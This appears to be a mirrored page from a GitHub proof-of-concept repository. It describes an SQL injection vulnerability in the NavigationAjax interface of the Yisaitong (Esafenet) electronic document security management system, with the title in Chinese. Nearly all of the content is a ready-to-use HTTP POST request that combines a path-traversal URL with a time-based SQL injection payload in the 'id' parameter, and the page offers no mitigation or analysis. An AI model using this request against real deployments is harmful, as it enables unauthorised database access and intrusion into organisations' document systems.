mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
15 lines
484 B
Markdown
15 lines
484 B
Markdown
## 亿赛通电子文档安全管理系统NavigationAjax接口存在SQL注入漏洞
|
|
|
|
|
|
## poc
|
|
```
|
|
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
|
|
Host:
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
command=nav&id=-999'waitfor delay '0:0:3'--+&name=&openId=
|
|
```
|
|
|
|

|